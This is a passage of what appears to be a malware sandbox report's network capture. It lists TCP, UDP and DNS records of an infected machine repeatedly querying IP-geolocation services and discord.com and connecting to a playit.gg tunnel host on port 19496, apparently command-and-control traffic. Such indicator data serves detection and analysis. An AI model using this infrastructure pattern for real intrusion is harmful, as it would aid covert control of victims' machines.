                                      Sep 7, 2024 01:48:54.638344049 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.638387918 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.638421059 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.638498068 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.638526917 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:54.638575077 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:54.640067101 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:55.054326057 CEST1949649810147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:55.054414988 CEST4981019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:58.145677090 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.145721912 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.145811081 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.146037102 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.146049023 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.638333082 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.638673067 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.639781952 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.639796019 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.640032053 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.641083002 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.684503078 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.717168093 CEST4980780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:58.797559023 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797604084 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797636986 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797662020 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.797681093 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797743082 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797831059 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.801158905 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:59.001163960 CEST4981019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:59.006258965 CEST1949649810147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:59.017163038 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:59.022021055 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:59.022130013 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:59.181162119 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:59.186055899 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.366458893 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:00.566498995 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.566560030 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:00.571501970 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.594583035 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:00.602626085 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.766669989 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:00.771519899 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.777142048 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:00.777173996 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:00.777354002 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:00.777801991 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:00.777813911 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.346347094 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.346431971 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.348115921 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:01.348197937 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.348206043 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.348459959 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.349508047 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.354361057 CEST8049822208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:01.354433060 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:01.354572058 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:01.362921000 CEST8049822208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:01.392508030 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.514957905 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.515016079 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.515048981 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.515116930 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.515120983 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.515305996 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.517163038 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.843399048 CEST8049822208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:01.969305038 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:03.000292063 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.000329971 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.000401974 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.000662088 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.000673056 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.466550112 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.466635942 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.467772007 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.467782021 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.468018055 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.468832016 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.516499043 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636077881 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636120081 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636157036 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636225939 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636280060 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.637208939 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.638071060 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.907057047 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:03.907174110 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:07.993417025 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:07.993439913 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:07.993676901 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:07.993937016 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:07.993949890 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.457082033 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.457277060 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.458381891 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.458389044 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.458630085 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.459748983 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.500500917 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.613929987 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.613965034 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.613991976 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.614058971 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.614075899 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.614109039 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.614146948 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.614178896 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.615842104 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.679447889 CEST4982780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:08.684335947 CEST8049827208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:08.684412003 CEST4982780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:08.684597015 CEST4982780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:08.689330101 CEST8049827208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:09.452181101 CEST8049827208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:09.463268042 CEST4982780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:09.468350887 CEST8049827208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:09.468415976 CEST4982780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:09.545974970 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:09.550750971 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:12.583434105 CEST49831443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:12.583470106 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:12.583844900 CEST49831443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:12.583844900 CEST49831443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:12.583879948 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.037322998 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.038672924 CEST49831443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:13.038672924 CEST49831443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:13.038701057 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.038938999 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.039987087 CEST49831443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:13.084498882 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.095191002 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:13.203633070 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.203691006 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.203723907 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.203803062 CEST44349831104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:13.203830957 CEST49831443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:13.203977108 CEST49831443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:13.206666946 CEST49831443192.168.2.5104.21.85.189

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 7, 2024 01:47:01.652681112 CEST5935153192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:01.660280943 CEST53593511.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:04.377768040 CEST5237353192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:04.407339096 CEST53523731.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:05.355971098 CEST6083653192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:05.364923000 CEST53608361.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:41.035281897 CEST5961553192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:41.046896935 CEST53596151.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:45.133057117 CEST6037053192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:45.142256975 CEST53603701.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:45.818895102 CEST6533153192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:45.826366901 CEST53653311.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:45.847522974 CEST6192153192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:45.854371071 CEST53619211.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:48.584542036 CEST5633753192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:48.878619909 CEST5942053192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:49.273549080 CEST53563371.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:49.282408953 CEST53594201.1.1.1192.168.2.5
                                      Sep 7, 2024 01:47:59.974980116 CEST5615453192.168.2.51.1.1.1
                                      Sep 7, 2024 01:47:59.982079983 CEST53561541.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:00.657717943 CEST6279453192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:00.666349888 CEST53627941.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:01.743432999 CEST5528653192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:01.755742073 CEST53552861.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:04.315138102 CEST6105153192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:04.321928978 CEST53610511.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:10.103230000 CEST5218153192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:10.110718966 CEST53521811.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:15.188628912 CEST6056753192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:15.390836000 CEST53605671.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:15.513102055 CEST5761653192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:15.522228003 CEST53576161.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:16.489011049 CEST5693253192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:16.495884895 CEST53569321.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:18.748456955 CEST6511053192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:18.755196095 CEST53651101.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:23.581475973 CEST6354453192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:23.588996887 CEST53635441.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:27.960617065 CEST5502553192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:27.978957891 CEST53550251.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:29.605412006 CEST6332553192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:29.613620043 CEST53633251.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:30.256105900 CEST5306853192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:30.263555050 CEST53530681.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:30.864029884 CEST6139053192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:30.871162891 CEST53613901.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:35.429744959 CEST5221053192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:35.437235117 CEST53522101.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:39.508030891 CEST4972353192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:39.524178028 CEST53497231.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:41.413149118 CEST5965153192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:41.451378107 CEST53596511.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:42.352967024 CEST5466953192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:42.362329960 CEST53546691.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:43.040323019 CEST6541853192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:43.047307014 CEST53654181.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:47.268054962 CEST5431653192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:47.276027918 CEST53543161.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:53.100297928 CEST5596153192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:53.347131968 CEST53559611.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:53.985632896 CEST5391753192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:53.992722988 CEST53539171.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:56.352865934 CEST6013553192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:56.359555006 CEST53601351.1.1.1192.168.2.5
                                      Sep 7, 2024 01:48:59.004132032 CEST4982753192.168.2.51.1.1.1
                                      Sep 7, 2024 01:48:59.015814066 CEST53498271.1.1.1192.168.2.5
                                      Sep 7, 2024 01:49:01.253130913 CEST6204153192.168.2.51.1.1.1
                                      Sep 7, 2024 01:49:01.347398996 CEST53620411.1.1.1192.168.2.5
                                      Sep 7, 2024 01:49:07.122364044 CEST5584553192.168.2.51.1.1.1
                                      Sep 7, 2024 01:49:07.129379034 CEST53558451.1.1.1192.168.2.5
                                      Sep 7, 2024 01:49:07.984330893 CEST5567853192.168.2.51.1.1.1
                                      Sep 7, 2024 01:49:07.992978096 CEST53556781.1.1.1192.168.2.5
                                      Sep 7, 2024 01:49:10.787456036 CEST6206453192.168.2.51.1.1.1
                                      Sep 7, 2024 01:49:10.794128895 CEST53620641.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 7, 2024 01:47:01.652681112 CEST192.168.2.51.1.1.10xd99bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:04.377768040 CEST192.168.2.51.1.1.10x8b0eStandard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:05.355971098 CEST192.168.2.51.1.1.10x1a26Standard query (0)ipbase.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:41.035281897 CEST192.168.2.51.1.1.10x1834Standard query (0)stage-von.gl.at.ply.ggA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:45.133057117 CEST192.168.2.51.1.1.10x7ac1Standard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:45.818895102 CEST192.168.2.51.1.1.10xad3eStandard query (0)ipbase.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:45.847522974 CEST192.168.2.51.1.1.10xe260Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:48.584542036 CEST192.168.2.51.1.1.10xbe7dStandard query (0)discord.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:48.878619909 CEST192.168.2.51.1.1.10x3c25Standard query (0)stage-von.gl.at.ply.ggA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:59.974980116 CEST192.168.2.51.1.1.10xa70fStandard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:00.657717943 CEST192.168.2.51.1.1.10xa249Standard query (0)ipbase.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:01.743432999 CEST192.168.2.51.1.1.10xbd4Standard query (0)stage-von.gl.at.ply.ggA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:04.315138102 CEST192.168.2.51.1.1.10x7c1cStandard query (0)discord.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:10.103230000 CEST192.168.2.51.1.1.10xece2Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:15.188628912 CEST192.168.2.51.1.1.10x3f99Standard query (0)stage-von.gl.at.ply.ggA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:15.513102055 CEST192.168.2.51.1.1.10xf5c3Standard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:16.489011049 CEST192.168.2.51.1.1.10xeb72Standard query (0)ipbase.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:18.748456955 CEST192.168.2.51.1.1.10x8e03Standard query (0)discord.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:23.581475973 CEST192.168.2.51.1.1.10xe39Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:27.960617065 CEST192.168.2.51.1.1.10x7c4fStandard query (0)stage-von.gl.at.ply.ggA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:29.605412006 CEST192.168.2.51.1.1.10xba9cStandard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.256105900 CEST192.168.2.51.1.1.10x3eaaStandard query (0)ipbase.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:30.864029884 CEST192.168.2.51.1.1.10xb15dStandard query (0)discord.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:35.429744959 CEST192.168.2.51.1.1.10x2334Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:39.508030891 CEST192.168.2.51.1.1.10xe054Standard query (0)stage-von.gl.at.ply.ggA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:41.413149118 CEST192.168.2.51.1.1.10x6ec8Standard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:42.352967024 CEST192.168.2.51.1.1.10x46Standard query (0)ipbase.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:43.040323019 CEST192.168.2.51.1.1.10x125dStandard query (0)discord.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:47.268054962 CEST192.168.2.51.1.1.10xd9d8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:53.100297928 CEST192.168.2.51.1.1.10x50b4Standard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:53.985632896 CEST192.168.2.51.1.1.10xca80Standard query (0)ipbase.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:56.352865934 CEST192.168.2.51.1.1.10x5570Standard query (0)discord.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:59.004132032 CEST192.168.2.51.1.1.10xf3fStandard query (0)stage-von.gl.at.ply.ggA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:01.253130913 CEST192.168.2.51.1.1.10x89eeStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:07.122364044 CEST192.168.2.51.1.1.10xbc28Standard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:07.984330893 CEST192.168.2.51.1.1.10xc900Standard query (0)ipbase.comA (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:49:10.787456036 CEST192.168.2.51.1.1.10xc1eStandard query (0)discord.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 7, 2024 01:47:01.660280943 CEST1.1.1.1192.168.2.50xd99bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:04.407339096 CEST1.1.1.1192.168.2.50x8b0eNo error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:04.407339096 CEST1.1.1.1192.168.2.50x8b0eNo error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:05.364923000 CEST1.1.1.1192.168.2.50x1a26No error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:05.364923000 CEST1.1.1.1192.168.2.50x1a26No error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:41.046896935 CEST1.1.1.1192.168.2.50x1834No error (0)stage-von.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:45.142256975 CEST1.1.1.1192.168.2.50x7ac1No error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:45.142256975 CEST1.1.1.1192.168.2.50x7ac1No error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:45.826366901 CEST1.1.1.1192.168.2.50xad3eNo error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:45.826366901 CEST1.1.1.1192.168.2.50xad3eNo error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:45.854371071 CEST1.1.1.1192.168.2.50xe260No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:49.273549080 CEST1.1.1.1192.168.2.50xbe7dNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:49.273549080 CEST1.1.1.1192.168.2.50xbe7dNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:49.273549080 CEST1.1.1.1192.168.2.50xbe7dNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:49.273549080 CEST1.1.1.1192.168.2.50xbe7dNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:49.273549080 CEST1.1.1.1192.168.2.50xbe7dNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:49.282408953 CEST1.1.1.1192.168.2.50x3c25No error (0)stage-von.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:59.982079983 CEST1.1.1.1192.168.2.50xa70fNo error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:47:59.982079983 CEST1.1.1.1192.168.2.50xa70fNo error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:00.666349888 CEST1.1.1.1192.168.2.50xa249No error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:00.666349888 CEST1.1.1.1192.168.2.50xa249No error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:01.755742073 CEST1.1.1.1192.168.2.50xbd4No error (0)stage-von.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:04.321928978 CEST1.1.1.1192.168.2.50x7c1cNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:04.321928978 CEST1.1.1.1192.168.2.50x7c1cNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:04.321928978 CEST1.1.1.1192.168.2.50x7c1cNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:04.321928978 CEST1.1.1.1192.168.2.50x7c1cNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:04.321928978 CEST1.1.1.1192.168.2.50x7c1cNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:10.110718966 CEST1.1.1.1192.168.2.50xece2No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:15.390836000 CEST1.1.1.1192.168.2.50x3f99No error (0)stage-von.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:15.522228003 CEST1.1.1.1192.168.2.50xf5c3No error (0)freegeoip.app188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:15.522228003 CEST1.1.1.1192.168.2.50xf5c3No error (0)freegeoip.app188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 7, 2024 01:48:16.495884895 CEST1.1.1.1192.168.2.50xeb72No error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
